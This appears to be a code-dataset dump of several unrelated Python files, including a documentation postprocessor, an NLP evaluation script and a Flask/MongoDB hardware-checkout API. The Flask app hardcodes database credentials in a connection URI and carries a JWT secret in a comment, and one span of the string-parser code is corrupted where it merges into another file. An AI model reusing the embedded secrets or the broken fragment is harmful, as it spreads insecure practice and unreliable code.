entry.url,\n \"children\": [],\n }\n elif entry.slug:\n # Recursively build the tree for internal links\n slug_cleaned = clean_slug(entry.slug)\n\n # Ensure that the user-specified slug is an existing page. 
We want to add this error\n # handling to the initial parse layer, but this works for now.\n # https://jira.mongodb.org/browse/DOCSP-7941\n try:\n slug_fileid: FileId = self.slug_fileid_mapping[slug_cleaned]\n except KeyError:\n self.diagnostics[fileid].append(\n MissingTocTreeEntry(slug_cleaned, ast.span[0])\n )\n continue\n\n slug: str = slug_fileid.without_known_suffix\n\n if entry.title:\n title: SerializableType = [\n n.Text((0,), entry.title).serialize()\n ]\n else:\n title_nodes = self.heading_handler.get_title(slug)\n title = (\n [node.serialize() for node in title_nodes]\n if title_nodes\n else None\n )\n\n toctree_node = {\n \"title\": title,\n \"slug\": \"/\" if slug == \"index\" else slug,\n \"children\": [],\n \"options\": {\"drawer\": slug not in self.toc_landing_pages},\n }\n\n # Don't recurse on the index page\n if slug_fileid not in visited_file_ids:\n new_ast = self.pages[slug_fileid].ast\n self.find_toctree_nodes(\n slug_fileid,\n new_ast,\n toctree_node,\n visited_file_ids.union({slug_fileid}),\n )\n\n if toctree_node:\n node[\"children\"].append(toctree_node)\n\n # Locate the correct directive object containing the toctree within this AST\n for child_ast in ast.children:\n self.find_toctree_nodes(fileid, child_ast, node, visited_file_ids)\n\n def breadcrumbs(self, tree: Dict[str, SerializableType]) -> Dict[str, List[str]]:\n \"\"\"Generate breadcrumbs for each page represented in the provided toctree\"\"\"\n page_dict: Dict[str, List[str]] = {}\n all_paths: List[Any] = []\n\n # Find all node to leaf paths for each node in the toctree\n if \"children\" in tree:\n assert isinstance(tree[\"children\"], List)\n for node in tree[\"children\"]:\n paths: List[str] = []\n get_paths(node, [], paths)\n all_paths.extend(paths)\n\n # Populate page_dict with a list of parent paths for each slug\n for path in all_paths:\n for i in range(len(path)):\n slug = path[i]\n page_dict[slug] = path[:i]\n return page_dict\n\n def toctree_order(self, tree: Dict[str, SerializableType]) -> List[str]:\n \"\"\"Return a pre-order traversal of the toctree to be used for internal page navigation\"\"\"\n order: List[str] = []\n\n pre_order(tree, order)\n return order\n\n\ndef pre_order(node: Dict[str, Any], order: List[str]) -> None:\n if not node:\n return\n if \"slug\" in node:\n order.append(node[\"slug\"])\n if \"children\" in node:\n for child in node[\"children\"]:\n pre_order(child, order)\n\n\ndef get_paths(node: Dict[str, Any], path: List[str], all_paths: List[Any]) -> None:\n \"\"\"Helper function used to retrieve the breadcrumbs for a particular slug\"\"\"\n if not node:\n return\n if node.get(\"children\") is None or len(node[\"children\"]) == 0:\n # Skip urls\n if \"slug\" in node:\n path.append(clean_slug(node[\"slug\"]))\n all_paths.append(path)\n elif \"project_name\" in node and node.get(\"primary\"):\n path.append(node[\"project_name\"])\n all_paths.append(path)\n else:\n # Recursively build the path\n for child in node[\"children\"]:\n subpath = path[:]\n subpath.append(clean_slug(node[\"slug\"]))\n get_paths(child, subpath, all_paths)\n\n\ndef clean_slug(slug: str) -> str:\n \"\"\"Strip file extension and leading/trailing slashes (/) from string\"\"\"\n slug = slug.strip(\"/\")\n\n # TODO: remove file extensions in initial parse layer\n # https://jira.mongodb.org/browse/DOCSP-7595\n root, ext = os.path.splitext(slug)\n if ext in SOURCE_FILE_EXTENSIONS:\n return root\n\n return slug\n\n\nclass DevhubPostprocessor(Postprocessor):\n \"\"\"Postprocess operation to be run if a project's 
default_domain is equal to 'devhub'\"\"\"\n\n # TODO: Identify directives that should be exposed in the rstspec.toml to avoid hardcoding\n # These directives are represented as list nodes; they will return a list of strings\n LIST_FIELDS = {\"devhub:products\", \"devhub:tags\", \":languages\"}\n # These directives have their content represented as children; they will return a list of nodes\n BLOCK_FIELDS = {\"devhub:meta-description\"}\n # These directives have their content represented as an argument; they will return a string\n ARG_FIELDS = {\"devhub:level\", \"devhub:type\", \":atf-image\"}\n # These directives have their content represented as children, along with a series of options;\n # they will return a dictionary with all options represented, and with the content represented as a list of nodes whose key is `children`.\n OPTION_BLOCK_FIELDS = {\":og\", \":twitter\"}\n\n def run(\n self, pages: Dict[FileId, Page]\n ) -> Tuple[Dict[str, SerializableType], Dict[FileId, List[Diagnostic]]]:\n if not pages:\n return {}, {}\n\n self.pages = pages\n self.build_slug_fileid_mapping()\n self.diagnostics: Dict[FileId, List[Diagnostic]] = defaultdict(list)\n\n include_handler = IncludeHandler(\n self.diagnostics, self.slug_fileid_mapping, self.pages\n )\n self.run_event_parser([(EventParser.OBJECT_START_EVENT, include_handler)])\n\n self.handle_substitutions()\n\n option_handler = ProgramOptionHandler(self.diagnostics)\n self.heading_handler = HeadingHandler(self.targets)\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.heading_handler),\n (EventParser.OBJECT_START_EVENT, self.add_titles_to_label_targets),\n (\n EventParser.OBJECT_START_EVENT,\n option_handler,\n ),\n ],\n [\n (EventParser.PAGE_START_EVENT, option_handler.reset),\n (EventParser.PAGE_END_EVENT, self.heading_handler.reset),\n ],\n )\n\n target_handler = TargetHandler(self.targets)\n self.run_event_parser(\n [(EventParser.OBJECT_START_EVENT, target_handler)],\n [(EventParser.PAGE_START_EVENT, target_handler.reset)],\n )\n\n def clean_and_validate_page_group_slug(slug: str) -> Optional[str]:\n \"\"\"Clean a slug and validate that it is a known page. 
If it is not, return None.\"\"\"\n cleaned = clean_slug(slug)\n if cleaned not in self.heading_handler:\n # XXX: Because reporting errors in config.toml properly is dodgy right now, just\n # log to stderr.\n logger.error(f\"Cannot find slug '{cleaned}'\")\n return None\n\n return cleaned\n\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.handle_refs),\n (EventParser.OBJECT_START_EVENT, self.flatten_devhub_article),\n ],\n [\n (EventParser.PAGE_START_EVENT, self.reset_query_fields),\n (EventParser.PAGE_END_EVENT, self.append_query_fields),\n ],\n )\n\n document = self.generate_metadata()\n # Normalize all page group slugs\n page_groups = {\n title: [\n slug\n for slug in (clean_and_validate_page_group_slug(slug) for slug in slugs)\n if slug\n ]\n for title, slugs in self.project_config.page_groups.items()\n }\n\n if page_groups:\n document.update({\"pageGroups\": page_groups})\n\n return document, self.diagnostics\n\n def reset_query_fields(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"To be called at the start of each page: reset the query field dictionary\"\"\"\n self.query_fields: Dict[str, Any] = {}\n\n def append_query_fields(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"To be called at the end of each page: append the query field dictionary to the\n top level of the page's class instance.\n \"\"\"\n # Save page title to query_fields, if it exists\n slug = clean_slug(fileid_stack.current.as_posix())\n self.query_fields[\"slug\"] = f\"/{slug}\" if slug != \"index\" else \"/\"\n title = self.heading_handler.get_title(slug)\n if title is not None:\n self.query_fields[\"title\"] = [node.serialize() for node in title]\n\n page.query_fields = self.query_fields\n\n def flatten_devhub_article(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"Extract fields from a page's AST and expose them as a queryable nested document in the page document.\"\"\"\n if not isinstance(node, n.Directive):\n return\n\n key = f\"{node.domain}:{node.name}\"\n\n if key == \"devhub:author\":\n # Create a dict unifying the node's options and children\n author_obj: Dict[str, SerializableType] = {}\n author_obj.update(node.options)\n author_obj[\"children\"] = [child.serialize() for child in node.children]\n\n self.query_fields.setdefault(\"author\", []).append(author_obj)\n elif key == \"devhub:related\":\n # Save list of nodes (likely :doc: roles)\n self.query_fields[node.name] = []\n if len(node.children) > 0:\n first_child = node.children[0]\n assert isinstance(first_child, n.Parent)\n for item in first_child.children:\n paragraph = item.children[0]\n self.query_fields[node.name].append(\n paragraph.children[0].serialize()\n )\n elif key in {\":pubdate\", \":updated-date\"}:\n date = node.options.get(\"date\")\n if date:\n self.query_fields[node.name] = date\n elif key in self.OPTION_BLOCK_FIELDS:\n # Create a dict unifying the node's options and children\n node_obj: Dict[str, SerializableType] = {}\n node_obj.update(node.options)\n node_obj[\"children\"] = [child.serialize() for child in node.children]\n\n self.query_fields[node.name] = node_obj\n elif key in self.ARG_FIELDS:\n if len(node.argument) > 0:\n self.query_fields[node.name] = node.argument[0].value\n elif key in self.BLOCK_FIELDS:\n self.query_fields[node.name] = [\n child.serialize() for child in node.children\n ]\n elif key in self.LIST_FIELDS:\n self.query_fields[node.name] = []\n if len(node.children) > 0:\n first_child = node.children[0]\n assert isinstance(first_child, n.Parent)\n 
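# A list-type field is parsed as a single list node whose children are the list items;\n # the deepest text node of each item supplies the queryable string value below.\n 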
list_items = first_child.children\n assert isinstance(list_items, List)\n for item in list_items:\n text_candidate = get_deepest(item)\n assert isinstance(text_candidate, n.Text)\n self.query_fields[node.name].append(text_candidate.value)\n","repo_name":"RichardBrowning/ProtoVIS-V1","sub_path":"proto_env/lib/python3.7/site-packages/snooty/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":57517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4968377178","text":"# coding=utf-8\n\ndef parseStrWithTagPair(s, start_tag, end_tag):\n\t'''\n\t根据一对起始标记,从字串中取出一组子字串\n\t'''\n\tfinal_result = []\n\tif s==None:\n\t\treturn final_result\n\n\tstart_poses = []\n\tend_poses = []\n\tkeys = [start_tag, end_tag]\n\tposes = [start_poses, end_poses]\n\tfor i in range(len(keys)):\n\t\tkey = keys[i]\n\t\tpos = 0\n\t\twhile pos>=0:\n\t\t\tnew_pos = s.find(key, pos)\n\t\t\tif new_pos<0:\n\t\t\t\tbreak\n\t\t\tposes[i].append(new_pos)\n\t\t\tpos = new_pos+len(key)\n\t\n\tif len(start_poses)= 0 and j not in queue:\n queue.append(j)\n queue.sort()\n if len(queue) < 3:\n ans = \"na\"\n else: \n ans = queue[2]\n print(i, ans)","repo_name":"boblancer/agoda-2019","sub_path":"1_smallest_positive.py","file_name":"1_smallest_positive.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24023376685","text":"import argparse\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\nfrom Env import Env\n\nconfig = {}\nwith open('conf/config.json') as confFile:\n config = json.load(confFile)\nif config == {}:\n raise Exception('Config file empty or does not exist!')\n\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"--learner\", dest=\"learn\", nargs=\"?\",\n default=False, const=True, help=\"does this bot learn\")\nparser.add_argument(\"--quiet\", dest=\"loglevel\",\n default=logging.DEBUG, action=\"store_const\", const=logging.INFO,\n help=\"substantially reduce the number of logged messages\")\nsettings = parser.parse_args()\n\nconfig['irwin']['learn'] = settings.learn\n\nenv = Env(config)\n\nlegits = env.playerAnalysisDB.legits()\nengines = env.playerAnalysisDB.engines()\n\nlegitMoveTensors = []\nlegitChunkTensors = []\nengineMoveTensors = []\nengineChunkTensors = []\nfor legit in legits:\n legitMoveTensors.extend(legit.tensorInputMoves())\n legitChunkTensors.extend(legit.tensorInputChunks())\n\nfor engine in engines:\n engineMoveTensors.extend(engine.tensorInputMoves())\n engineChunkTensors.extend(engine.tensorInputChunks())\n\nplt.hist(legitMoveTensors, bins=np.arange(0,100,2))\nplt.title('Move assessment frequency (Legits)')\nplt.show()\n\nplt.hist(engineMoveTensors, bins=np.arange(0,100,2))\nplt.title('Move assessment frequency (Engines)')\nplt.show()\n\nplt.hist(legitChunkTensors, bins=np.arange(0,100,2))\nplt.title('Chunk assessment frequency (Legits)')\nplt.show()\n\nplt.hist(engineChunkTensors, bins=np.arange(0,100,2))\nplt.title('Chunk assessment frequency (Engines)')\nplt.show()","repo_name":"tdy/irwin","sub_path":"move-assessment-graphs.py","file_name":"move-assessment-graphs.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"16624278891","text":"import pandas as pd\nimport numpy as np\nfrom pandarallel import pandarallel\nfrom datasets import load_from_disk\nfrom 
syntactic_divergence import calculate_syntactic_divergence\nimport os\nimport spacy\nfrom evaluate import load\nfrom pandarallel import pandarallel\nimport torch\nfrom qa_score import QAScore\nimport argparse\nimport re\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\nQA_SCORER = QAScore(device=DEVICE)\nRQUGE_SCORER = load(\"alirezamsh/rquge\", device=DEVICE)\n\nMODEL = 'en_core_web_lg'\ntry:\n nlp = spacy.load(MODEL)\nexcept OSError:\n os.system(f'python -m spacy download {MODEL}')\n nlp = spacy.load(MODEL)\n\nQA_PATTERN = re.compile(r'(?P.+) \\([a|A]nswer: (?P.+)\\)')\n\ndef qa_score(paragraph, question, answer):\n return np.mean(QA_SCORER.get_single_score(paragraph, question, answer))\n\ndef rquge(paragraph, question, answer):\n score = RQUGE_SCORER.compute(generated_questions=question, contexts=paragraph, answers=answer, device=DEVICE)\n return score['instance_score']\n\n\ndef main(args):\n pandarallel.initialize(nb_workers=args.num_workers, progress_bar=True)\n dataset = load_from_disk(args.dataset)['train']\n\n dataset = dataset.to_pandas()\n chosen_questions = dataset.loc[:, ['context', 'chosen']]\n chosen_questions.rename(columns={'chosen': 'question_and_answer'}, inplace=True)\n rejected_questions = dataset.loc[:, ['context', 'rejected']]\n rejected_questions.rename(columns={'rejected': 'question_and_answer'}, inplace=True)\n unique_questions = pd.concat([chosen_questions, rejected_questions]).drop_duplicates()\n unique_questions[['question', 'answer']] = unique_questions['question_and_answer'].str.extract(QA_PATTERN)\n\n # Need to break up as the number of samples is too much for RQUGE\n num = len(unique_questions)\n unique_questions.loc[:num//2, 'rquge'] = rquge(unique_questions.loc[:num//2, 'context'], unique_questions.loc[:num//2, 'question'], unique_questions.loc[:num//2, 'answer'])\n unique_questions.loc[num//2:, 'rquge'] = rquge(unique_questions.loc[num//2:, 'context'], unique_questions.loc[num//2:, 'question'], unique_questions.loc[num//2:, 'answer'])\n \n unique_questions['qa_score'] = unique_questions.apply(lambda x: qa_score(x['context'], x['question'], x['answer']), axis=1)\n\n\n unique_questions['answer_sentence'] = unique_questions.parallel_apply(lambda x: [sent.text for sent in nlp(x['context']).sents if x['answer'] in sent.text], axis=1)\n unique_questions['answer_sentence'] = unique_questions['answer_sentence'].parallel_apply(lambda x: x[0] if len(x) > 0 else None)\n unique_questions.loc[unique_questions['answer_sentence'].notna(), 'syntactic_divergence'] = \\\n unique_questions[unique_questions['answer_sentence'].notna()].parallel_apply(lambda x: calculate_syntactic_divergence(x['question'], x['answer_sentence'], x['answer']), axis=1)\n\n chosen_scores = unique_questions[unique_questions['question_and_answer'].isin(chosen_questions['question_and_answer'])]\n rejected_scores = unique_questions[unique_questions['question_and_answer'].isin(rejected_questions['question_and_answer'])]\n\n print('===== Chosen =====')\n chosen_scores['syntactic_divergence'] = chosen_scores['syntactic_divergence'].replace(-1, np.nan)\n print(chosen_scores[['syntactic_divergence', 'rquge', 'qa_score']].agg(['nanmean', 'nanstd']))\n chosen_scores.to_csv('chosen_scores.csv')\n\n print('===== Rejected =====')\n rejected_scores['syntactic_divergence'] = rejected_scores['syntactic_divergence'].replace(-1, np.nan)\n print(rejected_scores[['syntactic_divergence', 'rquge', 'qa_score']].agg(['nanmean', 'nanstd']))\n rejected_scores.to_csv('rejected_scores.csv')\n\n\nif __name__ == 
'__main__':\n parser = argparse.ArgumentParser(\n 'Calculates metrics of each half of the comparison split.')\n parser.add_argument('--dataset', type=str, default='../data/difficulty_comparisons',\n help='Path to dataset (default: %(default)s).')\n parser.add_argument('--num_workers', type=int, default=4,\n help='Number of workers for parallel processing (default: %(default)s).')\n args = parser.parse_args()\n main(args)\n","repo_name":"wrmthorne/AQG-From-Human-Feedback","sub_path":"evaluation/evaluate_comparisons.py","file_name":"evaluate_comparisons.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26762555426","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0004_globalsettings_check_in_date'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='globalsettings',\n name='enable_account_creation',\n field=models.BooleanField(default=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"ISEAGE-ISU/cdc-signup","sub_path":"base/migrations/0005_globalsettings_enable_account_creation.py","file_name":"0005_globalsettings_enable_account_creation.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16540046926","text":"# app.py\nfrom flask import Flask, jsonify, request\nfrom pymongo import MongoClient\nfrom pymongo.errors import PyMongoError\nimport certifi\nfrom flask_cors import CORS\nimport bcrypt\nfrom enum import Enum\n# TODO:\n# from flask_jwt_extended import create_access_token\n# from flask_jwt_extended import JWTManager\n# from flask_jwt_extended import jwt_required\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nca = certifi.where()\n\n# TODO: take configurations outside\n# MongoDB configuration\nDB_USER = 'ADAP'\nDB_USER_PASS = 'ADAP'\nMONGO_URI = f'mongodb+srv://{DB_USER}:{DB_USER_PASS}@adapdb.g2igjno.mongodb.net/?retryWrites=true&w=majority'\nDB_NAME = 'ADAPdb'\nUSERS_COLLECTION = 'Users'\nRESOURCES_COLLECTION = 'Resources'\nPROJECTS_COLLECTION = 'Projects'\n\n# TODO: ADD JWT LATER\n# app.config['JWT_SECRET_KEY'] = 'd4949995b0fff3aa8a69cf35092c71bdfa45388049089b91ad77a8f7a41aa61d699fdab8'\n# jwt = JWTManager(app)\n\n# TODO: move all these error functions to a different file\n\n# Enum of all status types\n\n\nclass StatusCode(Enum):\n SUCCESS = 200\n CREATION_SUCCESS = 201\n BAD_REQUEST = 400\n WRONG_CREDS = 401\n NOT_FOUND = 404\n USER_EXISTS = 409\n DATABASE_ERROR = 700\n SERVER_ERROR = 500\n\n# Enum of update type in hardware sets\n\n\nclass HardwareUpdateTyep(Enum):\n CHECK_IN = 'checkin'\n CHECK_OUT = 'checkout'\n\n\n# this function creates an error object\n# errorType -> to check with errorType\n# message -> message returned from exception or a custom message\ndef createErrorObject(statusCode, message):\n if statusCode is StatusCode.BAD_REQUEST.value:\n return {\n 'code': 400,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.WRONG_CREDS.value:\n return {\n 'code': 401,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.NOT_FOUND.value:\n return {\n 'code': 404,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.USER_EXISTS.value:\n 
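# 409 Conflict: a resource with the requested identifier (e.g. an existing projectID) was found.\n # Note: the 'is' comparisons in this chain rely on int object identity; '==' would be the safer idiom.\n 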
return {\n 'code': 409,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.SERVER_ERROR.value:\n return {\n 'code': 500,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.DATABASE_ERROR.value:\n return {\n 'code': 700,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n\n\n# TODO:\n# creates the login success object with access token\n# def createLoginSucessObject(username):\n# return {\n# 'code' : 200,\n# 'data' : {\n# 'accessToken' : create_access_token(identity=username)\n# },\n# 'message' : 'Success'\n# }\n\n\n# creates a success object with a message and status code\ndef createSuccessObject(statusCode, message):\n return {\n 'code': statusCode,\n 'data': {\n 'message': message\n },\n 'message': 'Success'\n }\n\n\n# creates a return object for get call of hardware sets\ndef createHardwareObject(statusCode, hardwareSets, message):\n return {\n 'code': statusCode,\n 'data': {\n 'hardwareSets': hardwareSets,\n 'message': message\n },\n 'message': 'Success'\n }\n\n\n# route for getting hardware\n@app.route('/api/get-hardware', methods=['GET'])\n# TODO:\n# @jwt_required()\ndef getHWSet():\n result = fetchHWSetsFromDB()\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createHardwareObject(\n statusCode=result['statusCode'], hardwareSets=result['hardwareSets'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n\n\n# fetches data from the DB\n# returns the result object or error object\ndef fetchHWSetsFromDB():\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n # use this empty array for the return object to be sent\n hardwareSets = []\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # add these objects in an array for the response\n else:\n object = {\n 'capacity': hwDataSet['capacity'],\n 'availability': hwDataSet['availability']\n }\n hardwareSets.append(object)\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'hardwareSets': hardwareSets,\n 'message': 'Hardware Data fetched successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# route for checkin/checkout 
hardware\n@app.route('/api/update-hardware', methods=['POST'])\ndef updateHWSets():\n # storing the request object\n hwSet1Qty = request.json['hardwareSet1']['quantity']\n hwSet2Qty = request.json['hardwareSet2']['quantity']\n type = request.json['type']\n\n # filter based on type of request\n if type == HardwareUpdateTyep.CHECK_IN.value:\n result = checkinHardwareSetsToDB(\n hwSet1Qty=hwSet1Qty, hwSet2Qty=hwSet2Qty)\n else:\n result = checkoutHardwareSetsToDB(\n hwSet1Qty=hwSet1Qty, hwSet2Qty=hwSet2Qty)\n\n # if returns error -> return the response object\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n # if successful, fetch the HW Sets and return as response\n else:\n getResult = fetchHWSetsFromDB()\n\n if getResult['isError']:\n returnObject = createErrorObject(\n statusCode=getResult['statusCode'], message=getResult['message'])\n return jsonify(returnObject), getResult['statusCode']\n else:\n returnObject = createHardwareObject(\n statusCode=getResult['statusCode'], hardwareSets=getResult['hardwareSets'], message=result['message'])\n return jsonify(returnObject), getResult['statusCode']\n\n\n# this method updates the database to reflect new available value of hardware\n# when user checks in number of units specified by quantity\ndef checkinHardwareSetsToDB(hwSet1Qty, hwSet2Qty):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # check the id and then check the difference between capacity and availability to know max checkin number\n elif hwDataSet['hardwareID'] == '1' and ((hwDataSet['capacity']-hwDataSet['availability']) >= hwSet1Qty):\n updatedAvailability = hwDataSet['availability'] + hwSet1Qty\n resourcesCollection.update_one(\n {'hardwareID': '1'}, {'$set': {'availability': updatedAvailability}})\n elif hwDataSet['hardwareID'] == '2' and ((hwDataSet['capacity']-hwDataSet['availability']) >= hwSet2Qty):\n updatedAvailability = hwDataSet['availability'] + hwSet2Qty\n resourcesCollection.update_one(\n {'hardwareID': '2'}, {'$set': {'availability': updatedAvailability}})\n # if these conditions don't meet then either qty1 or qty2 is wrong; send an error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 400,\n 'message': 'Trying to checkin more hardware than total capacity! The value entered is wrong. 
Please try again.'\n }\n return resultObject\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': 'Hardware Data updated successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# this method updates the database to reflect new available value of hardware\n# when user checks out number of units specified by quantity\ndef checkoutHardwareSetsToDB(hwSet1Qty, hwSet2Qty):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # check the id and then check the availability to know max checkout number\n elif hwDataSet['hardwareID'] == '1' and (hwDataSet['availability'] >= hwSet1Qty):\n updatedAvailability = hwDataSet['availability'] - hwSet1Qty\n resourcesCollection.update_one(\n {'hardwareID': '1'}, {'$set': {'availability': updatedAvailability}})\n elif hwDataSet['hardwareID'] == '2' and (hwDataSet['availability'] >= hwSet2Qty):\n updatedAvailability = hwDataSet['availability'] - hwSet2Qty\n resourcesCollection.update_one(\n {'hardwareID': '2'}, {'$set': {'availability': updatedAvailability}})\n else:\n # if these conditions don't meet then either qty1 or qty2 is wrong; send an error\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 400,\n 'message': 'Trying to checkout more hardware than available! The value entered is wrong. 
Please try again.'\n }\n return resultObject\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': 'Hardware Data updated successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# API endpoint for adding a new project\n@app.route('/api/create-project', methods=['POST'])\ndef create_project():\n\n # storing request project\n projectID = request.json['projectID']\n name = request.json['name']\n description = request.json['description']\n\n result = addproject(projectID=projectID, name=name,\n description=description)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n\n\ndef addproject(projectID, name, description):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the project collection\n projectCollection = db['Projects']\n\n # check if the collection is empty or not -> to avoid the first project registration\n if len(list(projectCollection.find())) != 0:\n # checking for the projectID, if already exists, return an object with an error\n if projectCollection.find_one({'projectID': projectID}):\n resultObject = {\n 'isError': True,\n 'statusCode': 409,\n 'message': 'ProjectID already exists'\n }\n return resultObject\n\n # create a new project\n newProject = {\n 'projectID': projectID,\n 'name': name,\n 'description': description\n }\n\n # insert project in the Projects collection\n projectCollection.insert_one(newProject)\n\n client.close()\n # return the success object\n resultObject = {\n 'isError': False,\n 'statusCode': 201,\n 'message': 'Project added successfully!',\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# Route to check if a ProjectID exists in the MongoDB database\n@app.route('/api/join-project', methods=['POST'])\ndef checkProjectID():\n # storing the request object\n projectID = request.json['projectID']\n\n result = checkProjectinDB(projectID=projectID)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n # TODO:\n # 
